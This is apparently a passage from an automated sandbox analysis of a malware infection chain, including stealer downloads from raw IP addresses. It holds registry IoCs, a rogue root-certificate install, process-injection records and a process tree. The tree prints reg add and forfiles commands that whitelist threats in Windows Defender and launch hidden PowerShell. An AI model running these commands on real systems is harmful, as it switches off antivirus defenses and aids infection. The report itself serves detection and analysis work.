Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={885A7A87-AB63-4A76-A8D1-34BE6C1ED385}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 2 IoCs

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

svhoost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	svhoost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	svhoost.exe

Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2276 PING.EXE
25112 PING.EXE

pid	process
2276	PING.EXE
25112	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

http77.91.77.81lendservices64.exe.exepowershell.exepowershell.exehttp77.91.77.81lendredline123123.exe.exeRegAsm.exejergs.exehttp198.23.201.89warmquote.exe.exehttp107.173.143.2820056igcc.exe.exehttp107.173.143.2820056igcc.exe.exeOne.exesvhoost.exehttp77.91.77.81lendnewbild.exe.exeOne.exesvhoost.exehttp198.23.227.21320040igcc.exe.exehttp107.173.143.2820055igcc.exe.exehttp107.173.143.2820055igcc.exe.exe

pid	process
1400	http77.91.77.81lendservices64.exe.exe
1400	http77.91.77.81lendservices64.exe.exe
4152	powershell.exe
1400	http77.91.77.81lendservices64.exe.exe
4152	powershell.exe
4152	powershell.exe
3876	powershell.exe
3876	powershell.exe
3288	http77.91.77.81lendredline123123.exe.exe
3288	http77.91.77.81lendredline123123.exe.exe
3876	powershell.exe
424	RegAsm.exe
424	RegAsm.exe
3872	jergs.exe
3872	jergs.exe
3004	http198.23.201.89warmquote.exe.exe
3004	http198.23.201.89warmquote.exe.exe
3004	http198.23.201.89warmquote.exe.exe
424	RegAsm.exe
424	RegAsm.exe
2696	http107.173.143.2820056igcc.exe.exe
2696	http107.173.143.2820056igcc.exe.exe
2696	http107.173.143.2820056igcc.exe.exe
4388	http107.173.143.2820056igcc.exe.exe
4388	http107.173.143.2820056igcc.exe.exe
4388	http107.173.143.2820056igcc.exe.exe
3512	One.exe
3512	One.exe
4212	svhoost.exe
4212	svhoost.exe
4764	http77.91.77.81lendnewbild.exe.exe
4764	http77.91.77.81lendnewbild.exe.exe
4764	http77.91.77.81lendnewbild.exe.exe
4764	http77.91.77.81lendnewbild.exe.exe
3284	One.exe
3284	One.exe
3288	http77.91.77.81lendredline123123.exe.exe
3288	http77.91.77.81lendredline123123.exe.exe
3288	http77.91.77.81lendredline123123.exe.exe
3288	http77.91.77.81lendredline123123.exe.exe
1472	svhoost.exe
1472	svhoost.exe
1472	svhoost.exe
1472	svhoost.exe
4764	http77.91.77.81lendnewbild.exe.exe
4764	http77.91.77.81lendnewbild.exe.exe
5660	http198.23.227.21320040igcc.exe.exe
5660	http198.23.227.21320040igcc.exe.exe
5660	http198.23.227.21320040igcc.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5536	http107.173.143.2820055igcc.exe.exe
5536	http107.173.143.2820055igcc.exe.exe
5536	http107.173.143.2820055igcc.exe.exe
4212	svhoost.exe
4212	svhoost.exe
4212	svhoost.exe
4212	svhoost.exe
1400	http77.91.77.81lendservices64.exe.exe
1400	http77.91.77.81lendservices64.exe.exe
1472	svhoost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Setup.exe

pid process

3152 Setup.exe

pid	process
3152	Setup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Setup.exeWMIC.exetasklist.exetaskkill.exepowershell.exetasklist.exepowershell.exeOne.exehttp77.91.77.81lendredline123123.exe.exeOne.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3152	Setup.exe
Token: SeIncreaseQuotaPrivilege	3004	WMIC.exe
Token: SeSecurityPrivilege	3004	WMIC.exe
Token: SeTakeOwnershipPrivilege	3004	WMIC.exe
Token: SeLoadDriverPrivilege	3004	WMIC.exe
Token: SeSystemProfilePrivilege	3004	WMIC.exe
Token: SeSystemtimePrivilege	3004	WMIC.exe
Token: SeProfSingleProcessPrivilege	3004	WMIC.exe
Token: SeIncBasePriorityPrivilege	3004	WMIC.exe
Token: SeCreatePagefilePrivilege	3004	WMIC.exe
Token: SeBackupPrivilege	3004	WMIC.exe
Token: SeRestorePrivilege	3004	WMIC.exe
Token: SeShutdownPrivilege	3004	WMIC.exe
Token: SeDebugPrivilege	3004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3004	WMIC.exe
Token: SeRemoteShutdownPrivilege	3004	WMIC.exe
Token: SeUndockPrivilege	3004	WMIC.exe
Token: SeManageVolumePrivilege	3004	WMIC.exe
Token: 33	3004	WMIC.exe
Token: 34	3004	WMIC.exe
Token: 35	3004	WMIC.exe
Token: 36	3004	WMIC.exe
Token: SeDebugPrivilege	3384	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3004	WMIC.exe
Token: SeSecurityPrivilege	3004	WMIC.exe
Token: SeTakeOwnershipPrivilege	3004	WMIC.exe
Token: SeLoadDriverPrivilege	3004	WMIC.exe
Token: SeSystemProfilePrivilege	3004	WMIC.exe
Token: SeSystemtimePrivilege	3004	WMIC.exe
Token: SeProfSingleProcessPrivilege	3004	WMIC.exe
Token: SeIncBasePriorityPrivilege	3004	WMIC.exe
Token: SeCreatePagefilePrivilege	3004	WMIC.exe
Token: SeBackupPrivilege	3004	WMIC.exe
Token: SeRestorePrivilege	3004	WMIC.exe
Token: SeShutdownPrivilege	3004	WMIC.exe
Token: SeDebugPrivilege	3004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3004	WMIC.exe
Token: SeRemoteShutdownPrivilege	3004	WMIC.exe
Token: SeUndockPrivilege	3004	WMIC.exe
Token: SeManageVolumePrivilege	3004	WMIC.exe
Token: 33	3004	WMIC.exe
Token: 34	3004	WMIC.exe
Token: 35	3004	WMIC.exe
Token: 36	3004	WMIC.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	2680	tasklist.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	3512	One.exe
Token: SeDebugPrivilege	3288	http77.91.77.81lendredline123123.exe.exe
Token: SeBackupPrivilege	3512	One.exe
Token: SeSecurityPrivilege	3512	One.exe
Token: SeSecurityPrivilege	3512	One.exe
Token: SeSecurityPrivilege	3512	One.exe
Token: SeSecurityPrivilege	3512	One.exe
Token: SeDebugPrivilege	3284	One.exe
Token: SeBackupPrivilege	3284	One.exe
Token: SeSecurityPrivilege	3284	One.exe
Token: SeSecurityPrivilege	3284	One.exe
Token: SeSecurityPrivilege	3284	One.exe
Token: SeSecurityPrivilege	3284	One.exe
Token: SeIncreaseQuotaPrivilege	5952	WMIC.exe
Token: SeSecurityPrivilege	5952	WMIC.exe
Token: SeTakeOwnershipPrivilege	5952	WMIC.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

Child.pifhttp192.3.83.115AAQ.exe.exehttpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exeExplorer.EXE

pid	process
5876	Child.pif
5876	Child.pif
5876	Child.pif
4760	http192.3.83.115AAQ.exe.exe
4760	http192.3.83.115AAQ.exe.exe
2376	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
2376	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
3320	Explorer.EXE

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

Child.pifhttp192.3.83.115AAQ.exe.exehttpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exeExplorer.EXE

pid	process
5876	Child.pif
5876	Child.pif
5876	Child.pif
4760	http192.3.83.115AAQ.exe.exe
4760	http192.3.83.115AAQ.exe.exe
2376	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
2376	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
3320	Explorer.EXE
3320	Explorer.EXE
3320	Explorer.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

http147.45.47.14954674radekano.exe.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid process

6092 http147.45.47.14954674radekano.exe.exe
744
5940 Conhost.exe
1044 Conhost.exe
4460 Conhost.exe
6580 Conhost.exe
1576 Conhost.exe
6860 Conhost.exe
Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

3916 RuntimeBroker.exe
3320 Explorer.EXE

pid	process
6092	http147.45.47.14954674radekano.exe.exe
744
5940	Conhost.exe
1044	Conhost.exe
4460	Conhost.exe
6580	Conhost.exe
1576	Conhost.exe
6860	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exehttptwizt.netnewtpp.exe.exehttp185.215.113.66pei.exe.exesyslmgrsvc.exehttp77.91.77.81lendlumma1234.exe.exehttp77.91.77.81lendjudit.exe.exestub.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3152 wrote to memory of 4756	3152	Setup.exe	http185.215.113.66pei.exe.exe
PID 3152 wrote to memory of 4756	3152	Setup.exe	http185.215.113.66pei.exe.exe
PID 3152 wrote to memory of 4756	3152	Setup.exe	http185.215.113.66pei.exe.exe
PID 3152 wrote to memory of 3016	3152	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 3152 wrote to memory of 3016	3152	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 3152 wrote to memory of 3016	3152	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 3016 wrote to memory of 976	3016	httptwizt.netnewtpp.exe.exe	syslmgrsvc.exe
PID 3016 wrote to memory of 976	3016	httptwizt.netnewtpp.exe.exe	syslmgrsvc.exe
PID 3016 wrote to memory of 976	3016	httptwizt.netnewtpp.exe.exe	syslmgrsvc.exe
PID 4756 wrote to memory of 2696	4756	http185.215.113.66pei.exe.exe	1621415420.exe
PID 4756 wrote to memory of 2696	4756	http185.215.113.66pei.exe.exe	1621415420.exe
PID 4756 wrote to memory of 2696	4756	http185.215.113.66pei.exe.exe	1621415420.exe
PID 3152 wrote to memory of 1400	3152	Setup.exe	http77.91.77.81lendservices64.exe.exe
PID 3152 wrote to memory of 1400	3152	Setup.exe	http77.91.77.81lendservices64.exe.exe
PID 3152 wrote to memory of 3288	3152	Setup.exe	http77.91.77.81lendredline123123.exe.exe
PID 3152 wrote to memory of 3288	3152	Setup.exe	http77.91.77.81lendredline123123.exe.exe
PID 3152 wrote to memory of 3288	3152	Setup.exe	http77.91.77.81lendredline123123.exe.exe
PID 3152 wrote to memory of 2252	3152	Setup.exe	http77.91.77.81lendlumma1234.exe.exe
PID 3152 wrote to memory of 2252	3152	Setup.exe	http77.91.77.81lendlumma1234.exe.exe
PID 3152 wrote to memory of 2252	3152	Setup.exe	http77.91.77.81lendlumma1234.exe.exe
PID 976 wrote to memory of 1832	976	syslmgrsvc.exe	1787010459.exe
PID 976 wrote to memory of 1832	976	syslmgrsvc.exe	1787010459.exe
PID 976 wrote to memory of 1832	976	syslmgrsvc.exe	1787010459.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 2252 wrote to memory of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 3152 wrote to memory of 3436	3152	Setup.exe	http77.91.77.81lendlumma123.exe.exe
PID 3152 wrote to memory of 3436	3152	Setup.exe	http77.91.77.81lendlumma123.exe.exe
PID 3152 wrote to memory of 3436	3152	Setup.exe	http77.91.77.81lendlumma123.exe.exe
PID 3152 wrote to memory of 3156	3152	Setup.exe	http77.91.77.81lendjudit.exe.exe
PID 3152 wrote to memory of 3156	3152	Setup.exe	http77.91.77.81lendjudit.exe.exe
PID 3156 wrote to memory of 1412	3156	http77.91.77.81lendjudit.exe.exe	stub.exe
PID 3156 wrote to memory of 1412	3156	http77.91.77.81lendjudit.exe.exe	stub.exe
PID 1412 wrote to memory of 3476	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 3476	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 4712	1412	stub.exe	84855294.exe
PID 1412 wrote to memory of 4712	1412	stub.exe	84855294.exe
PID 1412 wrote to memory of 2540	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 2540	1412	stub.exe	cmd.exe
PID 4712 wrote to memory of 3004	4712	cmd.exe	http198.23.201.89warmquote.exe.exe
PID 4712 wrote to memory of 3004	4712	cmd.exe	http198.23.201.89warmquote.exe.exe
PID 2540 wrote to memory of 3384	2540	cmd.exe	tasklist.exe
PID 2540 wrote to memory of 3384	2540	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 576	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 576	1412	stub.exe	cmd.exe
PID 576 wrote to memory of 2276	576	cmd.exe	PING.EXE
PID 576 wrote to memory of 2276	576	cmd.exe	PING.EXE
PID 1412 wrote to memory of 3540	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 3540	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 4484	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 4484	1412	stub.exe	cmd.exe
PID 4484 wrote to memory of 1520	4484	cmd.exe	taskkill.exe
PID 4484 wrote to memory of 1520	4484	cmd.exe	taskkill.exe
PID 1412 wrote to memory of 1004	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 1004	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 2796	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 2796	1412	stub.exe	cmd.exe
PID 1412 wrote to memory of 2872	1412	stub.exe	cmd.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

Processes:

http185.73.125.6applicationld.exe.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	http185.73.125.6applicationld.exe.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2276 attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:388

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1212
- C:\ProgramData\xcgjjnq\vklwj.exe
  C:\ProgramData\xcgjjnq\vklwj.exe start2
  2⤵
  - Executes dropped EXE
  PID:6100
- C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
  "C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:5940
- C:\ProgramData\xcgjjnq\vklwj.exe
  C:\ProgramData\xcgjjnq\vklwj.exe start2
  2⤵
  - Executes dropped EXE
  PID:5796
- C:\Users\Admin\AppData\Local\Temp\7zS29AC.tmp\Install.exe
  C:\Users\Admin\AppData\Local\Temp\7zS29AC.tmp\Install.exe PX /BgKdidTVKL 385118 /S
  2⤵
  PID:9204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:9724
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:10112
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:10196
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:9796
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:6816
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1336
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:7952
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:10080
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:10148
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:10168
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:9744
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6552
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:6512
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:9448
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2916
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4764
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD 